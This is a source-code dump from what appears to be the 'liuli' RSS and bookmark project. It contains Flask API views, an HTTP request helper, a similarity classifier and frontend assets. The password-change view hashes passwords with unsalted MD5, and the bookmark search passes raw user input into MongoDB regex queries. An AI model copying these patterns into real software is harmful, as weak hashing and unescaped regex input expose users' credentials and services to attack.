{db_res['info']}" 79 | app_logger.error(err_info) 80 | 81 | return response_handle(request=request, dict_value=result) 82 | -------------------------------------------------------------------------------- /src/api/views/api/action/rss_list.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-03-26. 3 | Description: 获取用户下所有 RSS 链接地址 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | 8 | from urllib.parse import urljoin 9 | 10 | from flask import current_app, request 11 | 12 | from src.api.common import ( 13 | ResponseCode, 14 | ResponseField, 15 | ResponseReply, 16 | UniResponse, 17 | jwt_required, 18 | response_handle, 19 | ) 20 | from src.config import Config 21 | from src.databases import MongodbBase 22 | from src.utils import get_ip, ts_to_str_date 23 | 24 | 25 | @jwt_required() 26 | def action_rss_list(): 27 | """获取用户下所有 RSS 链接地址 28 | eg: 29 | { 30 | "username": "liuli", 31 | "doc_source": "", 32 | } 33 | Returns: 34 | Response: 响应类 35 | """ 36 | mongodb_base: MongodbBase = current_app.config["mongodb_base"] 37 | app_logger = current_app.config["app_logger"] 38 | app_config: Config = current_app.config["app_config"] 39 | coll = mongodb_base.get_collection(coll_name="liuli_rss") 40 | # 获取基础数据 41 | post_data: dict = request.json 42 | doc_source = post_data.get("doc_source", "") 43 | filter_dict = {"doc_source": doc_source} if doc_source else {} 44 | return_dict = {"_id": 0, "doc_source": 1, "doc_source_name": 1, "updated_at": 1} 45 | domain: str = app_config.LL_DOMAIN or f"http://{get_ip()}:{Config.LL_HTTP_PORT}" 46 | 47 | try: 48 | cursor = coll.find(filter_dict, return_dict).sort("updated_at", 1) 49 | rss_dict = [] 50 | for document in cursor: 51 | updated_at = document["updated_at"] 52 | doc_source = document["doc_source"] 53 | doc_source_name = document["doc_source_name"] 54 | rss_dict.append( 55 | { 56 | **document, 57 | **{ 58 | "updated_at": ts_to_str_date(updated_at), 59 | "rss_url": urljoin( 60 | domain, f"rss/{doc_source}/{doc_source_name}" 61 | ), 62 | }, 63 | } 64 | ) 65 | result = { 66 | ResponseField.DATA: rss_dict, 67 | ResponseField.MESSAGE: ResponseReply.SUCCESS, 68 | ResponseField.STATUS: ResponseCode.SUCCESS, 69 | } 70 | except Exception as e: 71 | result = UniResponse.DB_ERR 72 | err_info = f"query doc RSS failed! DB response info -> {e}" 73 | app_logger.error(err_info) 74 | 75 | return response_handle(request=request, dict_value=result) 76 | -------------------------------------------------------------------------------- /liuli_web/src/layout/components/navHeader/changwPwdDialog.vue: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {{ userStore.username }} 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 取消 17 | 确认 18 | 19 | 20 | 21 | 22 | 23 | 78 | 79 | -------------------------------------------------------------------------------- /src/common/remote.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2021-12-30. 3 | Description: 外部调用相关请求 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | import json 7 | 8 | import cchardet 9 | import requests 10 | 11 | from src.utils import LOGGER 12 | 13 | 14 | def get_html_by_phantomjs(url: str, sk_key: str): 15 | """ 16 | 基于 phantomjs 获取html 17 | """ 18 | data = { 19 | "url": url, 20 | "renderType": "html", 21 | # "waitForSelector": "", 22 | } 23 | url = f"http://PhantomJScloud.com/api/browser/v2/{sk_key}/" 24 | html = "" 25 | try: 26 | req = requests.post(url, data=json.dumps(data), timeout=60) 27 | html = req.text 28 | except Exception as e: 29 | LOGGER.error(f"通过 Phantomjs 请求 {url} 失败! {e}") 30 | return html 31 | 32 | 33 | def get_html_by_requests(url: str, params: dict = None, timeout: int = 3, **kwargs): 34 | """发起GET请求,获取文本 35 | 36 | Args: 37 | url (str): 目标网页 38 | params (dict, optional): 请求参数. Defaults to None. 39 | timeout (int, optional): 超时时间. Defaults to 3. 40 | """ 41 | resp = send_get_request(url=url, params=params, timeout=timeout, **kwargs) 42 | text = None 43 | try: 44 | content = resp.content 45 | charset = cchardet.detect(content) 46 | text = content.decode(charset["encoding"]) 47 | except Exception as e: 48 | LOGGER.exception(f"请求内容提取出错 - {url} - {str(e)}") 49 | return text 50 | 51 | 52 | def send_get_request(url: str, params: dict = None, timeout: int = 3, **kwargs): 53 | """发起GET请求 54 | 55 | Args: 56 | url (str): 目标地址 57 | params (dict, optional): 请求参数. Defaults to None. 58 | timeout (int, optional): 超时时间. Defaults to 3. 59 | 60 | Returns: 61 | [type]: [description] 62 | """ 63 | try: 64 | resp = requests.get(url, params, timeout=timeout, **kwargs) 65 | except Exception as e: 66 | resp = None 67 | LOGGER.exception(f"请求出错 - {url} - {str(e)}") 68 | return resp 69 | 70 | 71 | def send_post_request(url: str, data: dict = None, timeout: int = 5, **kwargs) -> dict: 72 | """发起post请求 73 | 74 | Args: 75 | url (str): 目标地址 76 | data (dict, optional): 请求参数. Defaults to None. 77 | timeout (int, optional): 超时时间. Defaults to 5. 78 | 79 | Returns: 80 | dict: [description] 81 | """ 82 | try: 83 | resp_dict = requests.post( 84 | url, data=json.dumps(data), timeout=timeout, **kwargs 85 | ).json() 86 | except Exception as e: 87 | resp_dict = {} 88 | LOGGER.error(f"请求出错:{e}") 89 | return resp_dict 90 | -------------------------------------------------------------------------------- /liuli_web/src/style/gh-fork-ribbon.min.css: -------------------------------------------------------------------------------- 1 | /*! 2 | * "Fork me on GitHub" CSS ribbon v0.2.3 | MIT License 3 | * https://github.com/simonwhitaker/github-fork-ribbon-css 4 | */.github-fork-ribbon{width:12.1em;height:12.1em;position:absolute;overflow:hidden;top:0;right:0;z-index:9999;pointer-events:none;font-size:13px;text-decoration:none;text-indent:-999999px}.github-fork-ribbon.fixed{position:fixed}.github-fork-ribbon:active,.github-fork-ribbon:hover{background-color:rgba(0,0,0,0)}.github-fork-ribbon:after,.github-fork-ribbon:before{position:absolute;display:block;width:15.38em;height:1.54em;top:3.23em;right:-3.23em;-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-transform:rotate(45deg);-moz-transform:rotate(45deg);-ms-transform:rotate(45deg);-o-transform:rotate(45deg);transform:rotate(45deg)}.github-fork-ribbon:before{content:"";padding:.38em 0;background-color:#a00;background-image:-webkit-gradient(linear,left top,left bottom,from(rgba(0,0,0,0)),to(rgba(0,0,0,.15)));background-image:-webkit-linear-gradient(top,rgba(0,0,0,0),rgba(0,0,0,.15));background-image:-moz-linear-gradient(top,rgba(0,0,0,0),rgba(0,0,0,.15));background-image:-ms-linear-gradient(top,rgba(0,0,0,0),rgba(0,0,0,.15));background-image:-o-linear-gradient(top,rgba(0,0,0,0),rgba(0,0,0,.15));background-image:linear-gradient(to bottom,rgba(0,0,0,0),rgba(0,0,0,.15));-webkit-box-shadow:0 .15em .23em 0 rgba(0,0,0,.5);-moz-box-shadow:0 .15em .23em 0 rgba(0,0,0,.5);box-shadow:0 .15em .23em 0 rgba(0,0,0,.5);pointer-events:auto}.github-fork-ribbon:after{content:attr(data-ribbon);color:#fff;font:700 1em "Helvetica Neue",Helvetica,Arial,sans-serif;line-height:1.54em;text-decoration:none;text-shadow:0 -.08em rgba(0,0,0,.5);text-align:center;text-indent:0;padding:.15em 0;margin:.15em 0;border-width:.08em 0;border-style:dotted;border-color:#fff;border-color:rgba(255,255,255,.7)}.github-fork-ribbon.left-bottom,.github-fork-ribbon.left-top{right:auto;left:0}.github-fork-ribbon.left-bottom,.github-fork-ribbon.right-bottom{top:auto;bottom:0}.github-fork-ribbon.left-bottom:after,.github-fork-ribbon.left-bottom:before,.github-fork-ribbon.left-top:after,.github-fork-ribbon.left-top:before{right:auto;left:-3.23em}.github-fork-ribbon.left-bottom:after,.github-fork-ribbon.left-bottom:before,.github-fork-ribbon.right-bottom:after,.github-fork-ribbon.right-bottom:before{top:auto;bottom:3.23em}.github-fork-ribbon.left-top:after,.github-fork-ribbon.left-top:before,.github-fork-ribbon.right-bottom:after,.github-fork-ribbon.right-bottom:before{-webkit-transform:rotate(-45deg);-moz-transform:rotate(-45deg);-ms-transform:rotate(-45deg);-o-transform:rotate(-45deg);transform:rotate(-45deg)} 5 | /*# sourceMappingURL=gh-fork-ribbon.min.css.map */ -------------------------------------------------------------------------------- /src/api/views/api/user/change_pwd.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-03-26. 3 | Description: 修改用户密码 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | import time 8 | 9 | from flask import current_app, request 10 | 11 | from src.api.common import ( 12 | ResponseCode, 13 | ResponseField, 14 | ResponseReply, 15 | UniResponse, 16 | jwt_required, 17 | response_handle, 18 | ) 19 | from src.databases import MongodbBase, mongodb_find, mongodb_update_data 20 | from src.utils import md5_encryption 21 | 22 | 23 | @jwt_required() 24 | def user_change_pwd(): 25 | """修改密码 26 | eg: 27 | { 28 | "username": "liuli", 29 | "o_password": "liuli", 30 | "n_password": "liuli" 31 | } 32 | Returns: 33 | Response: 响应类 34 | """ 35 | # 获取基本配置 36 | mongodb_base: MongodbBase = current_app.config["mongodb_base"] 37 | app_logger = current_app.config["app_logger"] 38 | coll = mongodb_base.get_collection(coll_name="liuli_user") 39 | # 获取基础数据 40 | post_data: dict = request.json 41 | username = post_data.get("username") or "" 42 | o_password = post_data.get("o_password") or "" 43 | n_password = post_data.get("n_password") or "" 44 | user_db_res = mongodb_find( 45 | coll_conn=coll, 46 | filter_dict={"username": username, "password": md5_encryption(o_password)}, 47 | return_dict={"_id": 0}, 48 | ) 49 | user_info_list = user_db_res["info"] 50 | if username and n_password and user_db_res["status"] and len(user_info_list) == 1: 51 | # 历史用户存在 52 | db_res = mongodb_update_data( 53 | coll_conn=coll, 54 | filter_dict={"username": username}, 55 | update_data={ 56 | "$set": { 57 | "password": md5_encryption(n_password), 58 | "updated_at": int(time.time()), 59 | } 60 | }, 61 | ) 62 | if db_res["status"]: 63 | result = { 64 | ResponseField.DATA: {"username": username}, 65 | ResponseField.MESSAGE: ResponseReply.SUCCESS, 66 | ResponseField.STATUS: ResponseCode.SUCCESS, 67 | } 68 | 69 | else: 70 | result = UniResponse.CHANGE_PWD_ERROR 71 | err_info = f"change user pwd failed! DB response info -> {db_res['info']}" 72 | app_logger.error(err_info) 73 | 74 | else: 75 | result = UniResponse.CHANGE_PWD_ERROR 76 | err_info = f"change user pwd failed! DB response info -> {user_db_res}" 77 | app_logger.error(err_info) 78 | 79 | return response_handle(request=request, dict_value=result) 80 | -------------------------------------------------------------------------------- /src/api/views/api/bm/search.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-03-27. 3 | Description: 查询书签 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | from flask import current_app, request 7 | 8 | from src.api.common import ( 9 | ResponseCode, 10 | ResponseField, 11 | ResponseReply, 12 | UniResponse, 13 | jwt_required, 14 | response_handle, 15 | ) 16 | from src.databases import MongodbBase, mongodb_find_by_page 17 | 18 | 19 | @jwt_required() 20 | def bm_search(): 21 | """ 22 | 查询浏览器书签 23 | eg: 24 | { 25 | "url": "https://github.com/howie6879/liuli", 26 | "tags": ["1", "2"], 27 | "title": "title", 28 | "des": "des", 29 | "page": 1, 30 | "page_size": 2 31 | } 32 | """ 33 | # 获取基本配置 34 | mongodb_base: MongodbBase = current_app.config["mongodb_base"] 35 | app_logger = current_app.config["app_logger"] 36 | coll_bm = mongodb_base.get_collection(coll_name="liuli_bm") 37 | # 获取基础数据 38 | post_data: dict = request.json 39 | url = post_data.get("url", "").strip() 40 | # 全部小写去空格 41 | tags = [str(i).lower().strip() for i in post_data.get("tags", [])] 42 | title = post_data.get("title", "") 43 | des = post_data.get("des", "") 44 | 45 | # 分页限制 46 | page = post_data.get("page", 1) 47 | page_size = post_data.get("page_size", 10) 48 | 49 | filter_dict = {} 50 | 51 | if tags: 52 | filter_dict["tags"] = {"$elemMatch": {"$in": tags}} 53 | 54 | if url or title or des: 55 | filter_dict = {"$or": []} 56 | if url: 57 | filter_dict["$or"].append({"url": {"$regex": url, "$options": "$i"}}) 58 | if title: 59 | filter_dict["$or"].append({"title": {"$regex": title, "$options": "$i"}}) 60 | if des: 61 | filter_dict["$or"].append({"des": {"$regex": des, "$options": "$i"}}) 62 | 63 | result = UniResponse.SUCCESS 64 | 65 | db_res: dict = mongodb_find_by_page( 66 | coll_conn=coll_bm, 67 | filter_dict=filter_dict, 68 | size=page_size, 69 | page=page, 70 | return_dict={"_id": 0}, 71 | sorted_list=[("updated_at", 1)], 72 | ) 73 | 74 | if db_res["status"]: 75 | result = { 76 | ResponseField.DATA: db_res["info"], 77 | ResponseField.MESSAGE: ResponseReply.SUCCESS, 78 | ResponseField.STATUS: ResponseCode.SUCCESS, 79 | } 80 | else: 81 | result = UniResponse.DB_ERR 82 | err_info = f"search web bookmarket failed! DB response info -> {db_res['info']}" 83 | app_logger.error(err_info) 84 | 85 | return response_handle(request=request, dict_value=result) 86 | -------------------------------------------------------------------------------- /src/classifier/cos_predict.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | Created by howie.hu at 2021/4/8. 4 | Description:余弦相似度模型预测模块 5 | Changelog: all notable changes to this file will be documented 6 | """ 7 | 8 | from src.classifier.model_base.base import ModelPredictBase, ModelResponse 9 | from src.utils import is_contain_text 10 | 11 | 12 | class CosPredictModel(ModelPredictBase): 13 | """ 14 | 余弦相似度模型预测类 15 | """ 16 | 17 | def __init__(self, model_name: str, model_path: str, input_dict: dict): 18 | """ 19 | 初始化模型 20 | :param model_name: 可选,目前只有 cos 21 | :param model_path: 训练集路径 22 | :param input_dict: 使用者自定义的输入配置字典 23 | """ 24 | super().__init__(model_name, model_path, input_dict) 25 | # 加载模型 26 | model_dict = self._load_model() 27 | self.model = model_dict["model"] 28 | self.black_list = model_dict.get("black_list", []) 29 | self.white_list = model_dict.get("white_list", []) 30 | 31 | def process(self, text): 32 | """ 33 | 黑白名单判断 34 | :param text: 35 | :return: 36 | """ 37 | is_black = is_contain_text(text, self.black_list) 38 | is_white = is_contain_text(text, self.white_list) 39 | self.model_resp.feature_dict.update( 40 | {"is_black": is_black, "is_white": is_white, "text": text} 41 | ) 42 | return is_black, is_white 43 | 44 | def predict(self) -> ModelResponse: 45 | """ 46 | 返回预测结果 47 | :return: 48 | """ 49 | # 定义的必传参数 50 | text: dict = self.input_dict["text"] 51 | cos_value: dict = self.input_dict.pop("cos_value", 0.60) 52 | if text: 53 | is_black, is_white = self.process(text) 54 | 55 | if is_white: 56 | # 白名单优先 57 | self.model_resp.result = 0 58 | self.model_resp.probability = 0.0 59 | return self.model_resp 60 | 61 | elif is_black: 62 | self.model_resp.result = 1 63 | self.model_resp.probability = 1.0 64 | return self.model_resp 65 | 66 | else: 67 | model_res = self.model.predict(text=text, cos_value=cos_value) 68 | self.model_resp.result = model_res["result"] 69 | self.model_resp.probability = model_res["value"] 70 | 71 | return self.model_resp 72 | 73 | 74 | def predict(model_name: str, model_path: str, input_dict: dict) -> ModelResponse: 75 | """ 76 | 预测函数 77 | :param model_name: 78 | :param model_path: 79 | :param input_dict: 80 | :return: 81 | """ 82 | return CosPredictModel(model_name, model_path, input_dict).predict() 83 | --------------------------------------------------------------------------------
30 | 微信号 31 | howie_locker 32 |
35 | 功能介绍 36 | 编程、兴趣、生活 37 |